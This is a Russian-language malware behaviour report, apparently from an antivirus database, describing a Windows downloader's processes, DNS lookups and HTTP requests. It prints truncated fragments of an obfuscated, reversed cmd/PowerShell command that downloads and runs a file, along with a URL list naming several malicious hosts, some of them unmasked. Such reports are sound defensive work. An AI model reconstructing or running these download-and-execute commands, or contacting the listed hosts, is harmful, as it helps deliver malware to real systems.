Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:/C"set uy= }}{hctac}}kaerb;OpN$ ssecorP-tratS;)OpN$(elifotevas.SKA$;)ydoBesnopser.BLL$(etirw.SKA$;1 = epyt.SKA$;)(nepo.SKA${ )'*ZM*' ekil- txetesnopser.BLL$( fI;)(dnes.BLL$;)...
Сетевая активность
Подключается к
- 'ch###ellake.com':80
- 'ac##y.com':80
- 'ac####ltancy.com':80
TCP
Запросы HTTP GET
- http://ac##y.com/m6U
- http://ac####ltancy.com/Nm
UDP
- DNS ASK ch###ellake.com
- DNS ASK mi#####hoperwanda.org
- DNS ASK ac##y.com
- DNS ASK ak###rum.com
- DNS ASK ac####ltancy.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set uy= }}{hctac}}kaerb;OpN$ ssecorP-tratS;)OpN$(elifotevas.SKA$;)ydoBesnopser.BLL$(etirw.SKA$;1 = epyt.SKA$;)(nepo.SKA${ )'*ZM*' ekil- txetesnopser.BLL$( fI;)(dnes.BLL$;)...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "powershell $DTz='ivb';$wmq='http://ch###ellake.com/dYJXj@http://www.missionhoperwanda.org/02jK5x9@http://acbay.com/m6U@http://akdforum.com/JdKpSEk@http://aconsultancy.com/Nm'.Split('@');$NpO=(...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =ivb
